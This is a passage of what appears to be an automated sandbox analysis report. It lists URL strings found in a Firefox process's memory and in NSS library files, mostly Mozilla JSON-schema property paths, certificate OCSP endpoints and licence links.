Source: firefox.exe, 00000016.00000003.3040417631.0000018937D84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2932521244.0000018937D84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2980249152.0000018937D84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3153426972.0000018937D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.coma
Source: firefox.exe, 00000016.00000003.2979236204.00000189388BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2979236204.00000189388DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 00000016.00000003.2979236204.00000189388BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2979236204.00000189388DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3361812071.0000018941BD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3361812071.0000018941BD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-06/schema#Instance
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-07/schema#
Source: firefox.exe, 00000016.00000003.3361812071.0000018941BD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-07/schema#-
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-07/schema#Instance
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3256602064.00000189448AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3361812071.0000018941BD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000016.00000003.3364227569.0000018941B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/
Source: firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/appId
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/appName
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/appNameBranch
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
Source: firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledhttp://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 00000016.00000003.3253538885.00000189372A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/featureId
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value/additiona
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/slug
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabled
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureId
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value/additiona
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/featureI
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value
Source: firefox.exe, 00000016.00000003.3253538885.00000189372A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemsresource://gre/modul
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slug
Source: firefox.exe, 00000016.00000003.3253538885.00000189372A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1http://mozilla.org/#/properties/branches/anyOf/0http
Source: firefox.exe, 00000016.00000003.3253538885.00000189372A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features
Source: firefox.exe, 00000016.00000003.3253538885.00000189372A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/featureI
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value
Source: firefox.exe, 00000016.00000003.3253538885.00000189372A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/itemsThe
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratio
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/slug
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/count
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/namespace
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnit
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/start
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/total
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/channel
Source: firefox.exe, 00000016.00000003.3252634014.00000189372C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/csvImport
Source: firefox.exe, 00000016.00000003.3252634014.00000189372C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/disableGreaseOnFallback
Source: firefox.exe, 00000016.00000003.3252634014.00000189372C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/dnsMaxAnyPriorityThreads
Source: firefox.exe, 00000016.00000003.3252634014.00000189372C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/dnsMaxPriorityThreads
Source: firefox.exe, 00000016.00000003.3252634014.00000189372C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/dnsMaxPriorityThreadshttp://mozilla.org/#/properties/dnsMaxAnyPriori
Source: firefox.exe, 00000016.00000003.3252634014.00000189372C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/ehPreconnectEnabled
Source: firefox.exe, 00000016.00000003.3252634014.00000189372C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/ehPreloadEnabled
Source: firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/enableBookmarksToolbar
Source: firefox.exe, 00000016.00000003.3253538885.00000189372A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/endDate
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/enrollmentEndDate
Source: firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/experimentType
Source: firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 00000016.00000003.3253538885.00000189372A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/featureIds
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOut
Source: firefox.exe, 00000016.00000003.3252634014.00000189372C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/forceWaitHttpsRRhttp://mozilla.org/#/properties/tlsGreaseProb
Source: firefox.exe, 00000016.00000003.3252634014.00000189372C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/greasePaddingSize
Source: firefox.exe, 00000016.00000003.3252634014.00000189372C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/h3Enabled
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/id
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/idhttp://mozilla.org/#/properties/appIdhttp://mozilla.org/#/properti
Source: firefox.exe, 00000016.00000003.3252634014.00000189372C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/insecureFallbackhttp://mozilla.org/#/properties/h3GreaseEnabled
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperiment
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/isEnrollmentPaused
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/isRollout
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/isRolloutAn
Source: firefox.exe, 00000016.00000003.3253538885.00000189372A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
Source: firefox.exe, 00000016.00000003.3253538885.00000189372A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1
Source: firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/merinoClientVariants
Source: firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURL
Source: firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 00000016.00000003.3252634014.00000189372C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/networkPredictor
Source: firefox.exe, 00000016.00000003.3253538885.00000189372A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/outcomes/items
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/priority
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slug
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 00000016.00000003.3252634014.00000189372C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/preconnect
Source: firefox.exe, 00000016.00000003.3253538885.00000189372A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/proposedDurationhttp://mozilla.org/#/properties/featureIds/itemshttp
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/proposedEnrollment
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/proposedEnrollmenthttp://mozilla.org/#/properties/branches/anyOf/1/i
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabled
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariation
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType
Source: firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsEnabled
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialog
Source: firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShowOnboardingDialogAfterNRestarts
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredIndex
Source: firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/recordNavigationalSuggestionTelemetry
Source: firefox.exe, 00000016.00000003.3253538885.00000189372A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/referenceBranch
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/schemaVersion
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/schemaVersionhttp://mozilla.org/#/properties/slug
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/showSearchTermsFeatureGate
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/slug
Source: firefox.exe, 00000016.00000003.3253538885.00000189372A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/startDate
Source: firefox.exe, 00000016.00000003.3253538885.00000189372A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/targeting
Source: firefox.exe, 00000016.00000003.3252634014.00000189372C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/tlsEnabled
Source: firefox.exe, 00000016.00000003.3252634014.00000189372C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/tlsEnabledhttp://mozilla.org/#/properties/forceWaitHttpsRRhttp://moz
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/userFacingName
Source: firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/weatherFeatureGate
Source: firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLength
Source: firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLengthCap
Source: firefox.exe, 00000016.00000003.2944458491.0000018934CCA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2952243394.00000189356A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3239348386.00000189367C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3065552835.0000018935747000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3172798196.00000189377B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2877885291.00000189377B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3401231388.00000189360D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3065918902.0000018935054000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3016545723.0000018934CC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3014247184.00000189356A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2987924737.0000018935057000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2943371670.00000189360D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2890156235.000001893774B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3401231388.00000189360FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2970817554.0000018937DCE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2885385426.0000018937DCE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3395532884.0000018C0003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3257437685.00000189367B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3257437685.000001893676C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3146083118.0000018C0003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2943371670.00000189360FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3397921737.00000189470CB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3397921737.00000189470CB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3397921737.00000189470CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: firefox.exe, 00000016.00000003.3066594596.000001893378B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2990608782.000001893377C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
